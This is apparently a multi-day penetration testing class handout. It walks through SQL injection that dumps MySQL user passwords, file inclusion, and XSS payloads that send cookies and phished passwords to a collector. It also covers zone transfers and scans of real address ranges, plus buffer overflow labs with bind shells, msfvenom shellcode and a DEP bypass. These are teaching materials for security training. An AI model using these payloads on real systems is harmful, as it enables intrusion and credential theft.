Norway AppSec 2017

#######################
# Norway AppSec Class #
#######################


#################
# Passive Recon #
#################

- Wikipedia Page
    - Are they Public or Private?
    - Does the target have any subsidiaries?

- Robtex
    - Show system map

- Netcraft
    - http://toolbar.netcraft.com/site_report

- Passive Recon (Firefox Add-on)

- Example OSINT Report to review:
https://s3.amazonaws.com/infosecaddictsfiles/OSINT_Innophos_11242010.doc


##################################
# Basic: Web Application Testing #
##################################

Most people are going to tell you reference the OWASP Testing guide.
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.


The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.

    1. Does the website talk to a DB?
        - Look for parameter passing (ex: site.com/page.php?id=4)
        - If yes - try SQL Injection

    2. Can I or someone else see what I type?
        - If yes - try XSS

    3. Does the page reference a file?
        - If yes - try LFI/RFI

Let's start with some manual testing against 45.63.104.73


#######################
# Attacking PHP/MySQL #
#######################

Go to LAMP Target homepage
http://45.63.104.73/


Clicking on the Acer Link:
http://45.63.104.73/acre2.php?lap=acer

    - Found parameter passing (answer yes to question 1)
    - Insert ' to test for SQLI

http://45.63.104.73/acre2.php?lap=acer'


Page returns the following error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1


In order to perform union-based sql injection - we must first determine the number of columns in this query.
We do this using the ORDER BY
http://45.63.104.73/acre2.php?lap=acer' order by 100-- +

Page returns the following error:
Unknown column '100' in 'order clause'


http://45.63.104.73/acre2.php?lap=acer' order by 50-- +

Page returns the following error:
Unknown column '50' in 'order clause'


http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
Page returns the following error:
Unknown column '25' in 'order clause'


http://45.63.104.73/acre2.php?lap=acer' order by 12-- +

Page returns the following error:
Unknown column '50' in 'order clause'


http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns


Now we build out the union all select statement with the correct number of columns

Reference:
http://www.techonthenet.com/sql/union.php


http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +


Now we negate the parameter value 'acer' by turning into the word 'null':
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j

We see that a 4 and a 5 are on the screen. These are the columns that will echo back data


Use a cheat sheet for syntax:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet


http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +


http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a


########################
# Question I get a lot #
########################
Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.

Here is a good reference for it:
https://www.symantec.com/connect/blogs/mysql-injection-comments-comments

Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.


#########################
# File Handling Attacks #
#########################

Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
http://45.63.104.73/showfile.php?filename=about.txt


See if you can read files on the file system:
http://45.63.104.73/showfile.php?filename=/etc/passwd

We call this attack a Local File Include or LFI.

Now let's find some text out on the internet somewhere:
https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt


Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
http://45.63.104.73/showfile.php?filename=https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt


###############################################################################
# What is XSS                                                                 #
# https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx             #
###############################################################################

OK - what is Cross Site Scripting (XSS)

1. Use Firefox to browse to the following location:

    http://45.63.104.73/xss_practice/

    A really simple search page that is vulnerable should come up.


2. In the search box type:

    <script>alert('So this is XSS')</script>


    This should pop-up an alert window with your message in it proving XSS is in fact possible.
    Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/


3. In the search box type:

    <script>alert(document.cookie)</script>


    This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
    Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/

4. Now replace that alert script with:

    <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>


This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.


5. Now view the stolen cookie at:
    http://45.63.104.73/xss_practice/cookie_stealer_logs.html


The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.


############################
# A Better Way To Demo XSS #
############################


Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.


Use Firefox to browse to the following location:

    http://45.63.104.73/xss_practice/


Paste this in the search box
----------------------------


<script>
password=prompt('Your session is expired. Please enter your password to continue',' ');
document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
</script>


Now view the stolen cookie at:
    http://45.63.104.73/xss_practice/passwords.html


#########################
# Setting up Burp Suite #
#########################
Download the latest free version of FoxyProxy at https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

Download the latest free version of Burp at https://portswigger.net/burp/freedownload

Be sure to download the appropriate version for your computer system/OS.

Make sure that  burpsuite_free_v1.7.27.jar is set as executable (chmod +x burpsuite_free_v1.7.27.jar) and then run:

java -jar burpsuite_free_v1.7.27.jar

    - Click the "Proxy" tab
    - Click the "Options" sub tab
    - Click “Edit” in the “Proxy Listeners” section
    - In the “Edit proxy listener” pop up select “Binding Tab” select “loopback only”
    - In the same pop up make sure that the bind port is 8080
    - In the same pop up select the “Certificate” tab
    - Ensure that burp is configured to "generate CA-signed per-host certificates"

Open Firefox
    - Click "Edit"
    - Click “Preferences"
    - Click the "Advanced" tab
    - Click the "Network" sub tab
    - Click the connection "settings" button
    - Click "manual proxy configuration"
        set it to 127.0.0.1 port 8080
        check "Use this proxy server for all protocols"
    - Remove both the "localhost, 127.0.0.1" text from the "No Proxy For:" line


Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.

Visit any SSL-protected URL.

On the “This Connection is Untrusted” screen, click on “Add Exception”
Click "Get Certificate", then click "View".

In the “Details” tab, select the root certificate in the tree (PortSwigger CA).

Click "Export" and save the certificate as "BurpCert" on the Desktop.

Close Certificate Viewer dialog and click “Cancel” on the “Add Security Exception” dialog
Go to Edit | Preferences
Click “Advanced” and go to “Certificates” tab
Click “View Certificates”

Click "Import" and select the certificate file that you previously saved.

On the "Downloading Certificate" dialog, check the box "Trust this CA to identify web sites", and click "OK".

Close all dialogs and restart Firefox


###############################################################
# Question 1: What is the process that you use when you test? #
###############################################################

Step 1: Automated Testing

Step 1a: Web Application vulnerability scanners
-----------------------------------------------
- Run two (2) unauthenticated vulnerability scans against the target
- Run two (2) authenticated vulnerability scans against the target with low-level user credentials
- Run two (2) authenticated vulnerability scans against the target with admin privileges

The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).

A good web application vulnerability scanner comparison website is here:
http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html


Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.

When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.


Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.


Also, be sure to save the scan results and logs. I usually provide this data to the customer.


Step 1b: Directory Brute Forcer
-------------------------------
I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).


Step 2: Manual Testing

Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).

Step 2a: Spider/Scan the entire site with Burp Suite
Save the spider and scan results. I usually provide this data to the customer as well.


Step 2b: Browse through the site using the 3 question method
Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.

Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.

Here is what I mean:
http://www.site.com/page.aspx?parametername=parametervalue

When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:

http://www.site.com/page.aspx?parametername=[ payload ]

You need to ensure that you send the payload this way, and like this below:

http://www.site.com/page.aspx?parametername=parametervalue[ payload ]

This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.


###########################################
# Question 2: How much fuzzing is enough? #
###########################################
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.

Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.


Step 1: Ask yourself the 3 questions per page of the site.

Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)

Step 3: When you load your fuzz strings - use the following decision tree

    - Are the fuzz strings causing a default error message (example 404)?
        - If this is the case then it is most likely NOT vulnerable

    - Are the fuzz strings causing a WAF or LB custom error message?
        - If this is the case then you need to find an encoding method to bypass


    - Are the fuzz strings causing an error message that discloses the backend type?
        - If yes, then identify DB type and find correct syntax to successfully exploit
        - Some example strings that I use are:
            '
            "
            ()          <----- Take the parameter value and put it in parenthesis
            (5-1)       <----- See if you can perform an arithmetic function


    - Are the fuzz strings rendering executable code?
        - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
        - Some example strings that I use are:
            <b>hello</b>
            <u>hello</u>
            <script>alert(123);</script>
            <script>alert(xss);</script>
            <script>alert('xss');</script>
            <script>alert("xss");</script>


-------------------------------------------------------------------------------------------
 OWASP Top 10 Video Explanations

Burp Suite Reference:
https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten

A1: Injection Vulnerabilities
https://www.youtube.com/watch?v=9CnpHT5Nn8c&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj


A2: Broken Authentication and Session Management
https://www.youtube.com/watch?v=R1iGRBG3PJ8&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=2

A3: Cross Site Scripting (XSS)
https://www.youtube.com/watch?v=90XT0j5E7xo&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=4

A4: Insecure Direct Object Reference
https://www.youtube.com/watch?v=bMYpGj2xzpM&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=5


A5: Security Misconfiguration
https://www.youtube.com/watch?v=ouuXu9_UM0w&index=7&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj


A6: Sensitive Data Exposure
https://www.youtube.com/watch?v=x-B8I420x7Y&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=8


A7: Missing Function Level Access Control and A8 Cross-Site Request Forgery (CSRF)
https://www.youtube.com/watch?v=gf6cb7MnP-c&index=9&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj

A9 Using Components w/ Known Vulnerabilities & A10 Unvalidated Redirects and Forwards
https://www.youtube.com/watch?v=WqlSl-Pc1vk&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=10


************************ Class Homework ************************

In order to collaborate with the other students on your homework you must signup with your Gmail account using the following Google form:
https://goo.gl/forms/Ou5yi0VhbLJZBufg2

Filling out this form will give you access to the Google Drive folder where the class homework is contained.


Day 1 Homework:
---------------
Here is a good reference for how to install and configure Burp Suite:
https://nvisium.com/blog/2014/01/10/setting-up-burpsuite-with-firefox-and/


Create a step by step walk-through that details how to install and configure burp suite in Windows, and in Linux.
Team 1: Windows
Team 2: Linux


Day 2 Homework:
---------------
Here is a good reference of how to use Burp to look for OWASP Top 10 vulnerabilities:
https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten


Use Burp Suite to demonstrate with screenshots and explanations of how to test for the all of the OWASP Top 10 vulnerabilities against your choice of targets the following targets:
Team 1: http://45.63.104.73/
Team 2: http://54.245.184.121/


---------------------------------------------------------------------------------------------------------


#########
# Day 3 #
#########

yum -y update

yum -y groupinstall 'Development Tools'

yum -y install nmap bind-utils vim


cd ~

mkdir toolz

cd ~/toolz

wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c

gcc ipcrawl.c -o ipcrawl

chmod 777 ipcrawl

wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c

gcc propecia.c -o propecia

chmod 777 propecia

cp propecia /bin

cd ~/toolz/

./ipcrawl 148.87.1.1 148.87.1.254

nmap -sL 148.87.1.0-255

nmap -sL 148.87.1.0-255 | grep oracle

dig axfr heartinternet.co.uk  @ns.heartinternet.co.uk


#################################################
# Screenshotting the Web Servers in the Network #
#################################################
cd ~/toolz/
mkdir labscreenshots
cd labscreenshots/


wget https://s3.amazonaws.com/infosecaddictsfiles/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
cd wkhtmltox/bin/
cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386


cd ~/toolz/
git clone git://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/

cp http-screenshot.nse /usr/share/nmap/scripts/


nmap --script-updatedb

cd ~/toolz/
propecia 10.250.100 80 >> temp
strings temp >> labnet-ip-list.txt

cd ~/toolz/labscreenshots/
nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.250.100.0/24 -iL /root/toolz/labnet-ip-list.txt


-----------------------------------------
vi screenshots.sh

#!/bin/bash
printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
-----------------------------------------


sh screenshots.sh


python -m SimpleHTTPServer


--- Now browse to the IP of your Linux machine on port 8000 (http://10.250.100.157:8000/labnet-port-80-screenshots.html):
http://CentOS-VM-IP:8000/labnet-port-80-screenshots.html


##########################
# Nmap NSE tricks to try #
##########################
nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.250.100.0/24

 /sbin/iptables -F
nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.250.100.0/24


nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.250.100.0/24


nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.250.100.0/24


nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.250.100.0/24


nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.250.100.0/24


#####################################
# Writing Your Own Nmap NSE Scripts #
#####################################


----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
-- The Rule Section --
portrule = function(host, port)
    return port.protocol == "tcp"
            and port.number == 80
            and port.state == "open"
end

-- The Action Section --
action = function(host, port)
    return "Norway rocks!"
end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse .com -p 22,80,443


----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"

-- The Rule Section --
portrule = shortport.http


-- The Action Section --
action = function(host, port)
    return "Norway rocks!"
end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse .com -p 22,80,443


OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.

----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
    return response.status

end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443


----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        return response.body
    end

end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443


----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
        return title
    end

end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443


----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")

        if (title) then
            return "Vulnerable"
        else
            return "Not Vulnerable"
        end
    end
end

----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443


########################
# Scanning Methodology #
########################

- Ping Sweep
What's alive?
------------
sudo nmap -sP 157.166.226.*


    -if -SP yields no results try:
sudo nmap -sL 157.166.226.*

    -Look for hostnames:
sudo nmap -sL 157.166.226.* | grep com


- Port Scan
What's where?
------------
sudo nmap -sS 162.243.126.247


- Bannergrab/Version Query
What versions of software are running
-------------------------------------
sudo nmap -sV 162.243.126.247


- Vulnerability Research
Lookup the banner versions for public exploits
----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/


#####################################
# Quick Stack Based Buffer Overflow #
#####################################

- You can download everything you need for this exercise (except netcat) from the link below
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip

https://s3.amazonaws.com/infosecaddictsfiles/nc-password-is-netcat.zip
- The password for the file is 'netcat'

- Extract this zip file to your Desktop

Open a command prompt
=====================

Browse to the folder C:\Users\Student\Desktop\ExploitLab\1-Software-To-Install and install both Python and Nmap


- Go to folder C:\Users\Student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:
ncat localhost 9999

- In the new command prompt window where you ran ncat type:
HELP

- Go to folder C:\Users\Student\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++


cd c:\Python27>

c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.


- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.

- Now go to folder C:\Users\Student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\Student\Desktop\ExploitLab\4-AttackScripts and run 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).


- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

cd c:\Python27>

c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\2-3000chars.py


- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338

cd c:\Python27>

c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\3-3000chars.py


4-count-chars-to-EIP.py
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it

cd c:\Python27>

c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\4-count-chars-to-EIP.py


5-2006char-eip-check.py
- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242

cd c:\Python27>

c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\5-2006char-eip-check.py


6-jmp-esp.py
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll

cd c:\Python27>

c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\6-jmp-esp.py


7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

cd c:\Python27>


c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\7-first-exploit.py


#########
# Day 4 #
#########
Please download this file to your Windows host machine, and extract it to your Desktop.
https://s3.amazonaws.com/infosecaddictsfiles/ED-Workshop-Files.zip


###########################
# Lab 1a: Stack Overflows #
###########################

    #############################
    # Start WarFTPd             #
    # Start WinDBG              #
    # Press F6                  #
    # Attach to war-ftpd.exe    #
    #############################
cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a


python warftpd1.py | nc XPSP3-ED-Target-IP 21

    At WINDBG prompt
    “r” to show registers or “alt+4”

    dd esp


python warftpd2.py | nc XPSP3-ED-Target-IP 21


    At WINDBG prompt
    “r” to show registers or “alt+4”
    dd esp

    Eip: 32714131
    esp: affd58     (71413471)

    Now we need to SSH into the StrategicSec Ubuntu host

    cd /home/strategicsec/toolz/metasploit/tools/exploit

    ruby pattern_offset.rb 32714131
    485

    ruby pattern_offset.rb 71413471
    493

    Distance to EIP is:         485
    Relative position of ESP is:    493

    RET – POP EIP
    RET 4 – POP EIP and shift ESP down by 4 bytes

    cd /home/strategicsec/toolz/metasploit/
    ./msfpescan -j ESP DLLs/xpsp3/shell32.dll

        0x7c9c167d push esp; retn 0x304d
        0x7c9d30d7 jmp esp < - how about we use this one
        0x7c9d30eb jmp esp
        0x7c9d30ff jmp esp


        warftpd3.py with Notepad++
        Fill in the appropriate values
        Distance to EIP
        Address of JMP ESP


python warftpd3.py | nc XPSP3-ED-Target-IP 21

    0:003> dd eip
    0:003> dd esp


    Mention bad characters
    No debugger


python warftpd4.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444


-------------------------------------------------------------

There are 2 things that can go wrong with shellcode. The first thing is a lack of space, and the second is bad characters.

Shellcode test 1: Calculate space for shellcode
Look in the warftpd3.py script for the shellcode variable. Change the length of the shellcode being send to test how much you can send before the CCs truncate.


Shellcode test 2: Identify bad characters

Replace the INT3 (cc) dummy shellcode with this string:
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"


Send this new shellcode string and identify the places where it truncates - these are the bad characters


Here is what the string looks like after I manually tested and removed each of the bad characters:
shellcode = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"


./msfvenom -p windows/shell/bind_tcp -f python -b '\x00\x0a\x0d\x40'


###########################################
# Lab 1b: Stack Overflows with DEP Bypass #
###########################################

Reboot your target host and choose the "2nd" option for DEP.


cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b


python warftpd1.py | nc XPSP3-ED-Target-IP 21

    At WINDBG prompt
    “r” to show registers or “alt+4”

    dd esp


python warftpd2.py | nc XPSP3-ED-Target-IP 21


    At WINDBG prompt
    “r” to show registers or “alt+4”
    dd esp

    Eip: 32714131
    esp: affd58     (71413471)

    Now we need to SSH into the StrategicSec Ubuntu host

    cd /home/strategicsec/toolz/metasploit/tools/exploit

    ruby pattern_offset.rb 32714131
    485

    ruby pattern_offset.rb 71413471
    493


cd /home/strategicsec/toolz/metasploit/tools/exploit

ruby pattern_offset.rb 32714131

cd /home/strategicsec/toolz/metasploit/

./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7


python warftpd3.py | nc XPSP3-ED-Target-IP 21

    0:003> dd eip
    0:003> dd esp

INT3s - GOOD!!!!!!!


python warftpd4.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444


strategicsec....exploit no workie!!!!


Why????????? DEP!!!!!!!!!!!!!


Let's look through ole32.dll for the following instructions:

mov al,0x1
ret 0x4

We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.


./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll

[DLLs/xpsp3/ole32.dll]
0x775ee00e b001c204
0x775ee00e      mov al, 1
0x775ee010      ret 4


Then we need to jump to the LdrpCheckNXCompatibility routine in
ntdll.dll that disables DEP.


Inside of ntdll.dll we need to find the following instructions:

CMP AL,1
